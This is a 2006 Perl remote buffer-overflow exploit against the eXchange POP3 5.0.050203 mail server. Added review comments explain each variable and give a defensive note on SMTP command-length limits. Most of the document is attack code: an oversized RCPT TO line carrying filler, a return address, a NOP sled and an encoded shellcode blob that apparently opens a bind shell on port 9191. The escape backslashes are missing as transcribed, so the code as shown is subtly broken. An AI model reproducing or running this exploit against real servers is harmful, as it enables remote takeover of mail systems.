
# Title : eXchange POP3 5.0.050203 (rcpt to) Remote Buffer Overflow Exploit
# Published : 2006-02-03
# Author : securma massine


#!/usr/bin/perl -w
# for educational purposes only .
#
# Flat script with no subroutines.  It takes one command-line argument (the
# target address), opens a TCP connection to port 25 on it, sends a bare
# "mail" command, then sends a single "rcpt to:<" line whose argument is far
# larger than any legitimate mailbox path: 4100 units of filler ($buffer),
# a 4-unit value ($ret), a ~2,000,000-unit second filler ($buffer2) and an
# opaque byte string ($shellcode), terminated by $enter.  Server responses
# are read and printed but never checked, and the script exits after printing
# two status messages.
#
# NOTE(review): as transcribed on this page the escape sequences have lost
# their backslashes ("x90", "x41", "n", ...), so each is a run of literal
# letters rather than the bytes the names suggest; the comments below describe
# the evident intent of the variables, not what this text would actually emit.
#
# Defensive note: an RCPT TO line of roughly two megabytes is trivially
# distinguishable from legitimate SMTP traffic (RFC 5321 limits the forward
# path to 256 octets and the whole command line to 512), so enforcing that
# limit at the SMTP front end, and alerting on oversized command lines,
# addresses this whole class of input regardless of the payload bytes.
#
# No `use strict`/`use warnings` pragma; every variable below is an undeclared
# package global, and $text is used without prior assignment.
  use IO::Socket;
                      # Require at least one argument (the target host or IP).
                      if ($#ARGV<0) 
                    { 
                         print "n write the target IP!! nn"; 
                       exit; 
                     } 
                # Second filler block, placed after $ret; "x90" suggests a
                # NOP-sled intent (0x90), but as written it is literal text.
                $buffer2 = "x90"x1999999;
                # First SMTP command sent: bare "mail" with no FROM: argument.
                $mailf= "mail";
                # The oversized argument is delivered inside an RCPT TO line.
                $rcptt ="rcpt to:<";
                # First filler block: 4100 repetitions preceding $ret.
                $buffer = "x41"x4100;
                # Four-unit value following the first filler; presumably the
                # overwritten return address named in the title — not
                # verifiable from this file.
                $ret   = "x80x1dxdcx02";
                # Opaque byte string appended after $buffer2.  Its contents are
                # not documented on the page; the closing status message
                # suggests it is expected to listen on TCP 9191 — unverified.
                $shellcode = "xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33".
                      "xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C".
                      "x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE".
                      "x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB".
                      "xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77".
                      "xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77".
                      "xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77".
                      "xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77".
                      "xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77".
                      "xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77".
                      "xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77".
                      "xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77".
                      "xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77".
                      "xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB".
                      "x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C".
                      "xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0".
                      "x8Ax88xABx6Fx03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77".
                      "xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0".
                      "xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB".
                      "x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5".
                      "x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98".
                      "xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE".
                      "x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77".
                      "xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8".
                      "x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF".
                      "x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90".
                      "x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74".
                      "xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4".
                      "xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94".
                      "x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5".
                      "xD3x4Ax8Cx88";

                # Line terminator appended to each command (intended CRLF).
                $enter  = "x0dx0a";
                # Connect to port 25 (SMTP) on the address given in @ARGV — note the
                # title says POP3, but the traffic here is sent to the SMTP port.
                # The address is interpolated unvalidated straight from @ARGV.
                $connect = IO::Socket::INET ->new (Proto=>"tcp",
                PeerAddr=> "$ARGV[0]",
                PeerPort=>"25"); unless ($connect) { die "cant connect" }  
                print "nExchangepop3 v5.0  remote exploit by securma massinen";
                print "n+++++++++++www.morx.org++++++++++++++++n";              
                # Read up to 128 bytes of the server banner and echo it.  $text is
                # never declared; the reply code is not examined.
                $connect->recv($text,128); 
                print "$textn";
                # Send the "mail" command, then read and echo the reply without
                # checking it.
                $connect->send($mailf . $enter); 
                $connect->recv($text,128); 
                print "$textn";
                # Single oversized RCPT TO line: prefix, filler, $ret, second filler,
                # opaque byte string, terminator.  Nothing is read back after this.
                $connect->send($rcptt . $buffer . $ret . $buffer2 .  $shellcode . $enter); 
                print "nsending exploit......nn";
                 print "ntelnet to  server port 9191 .........nn";
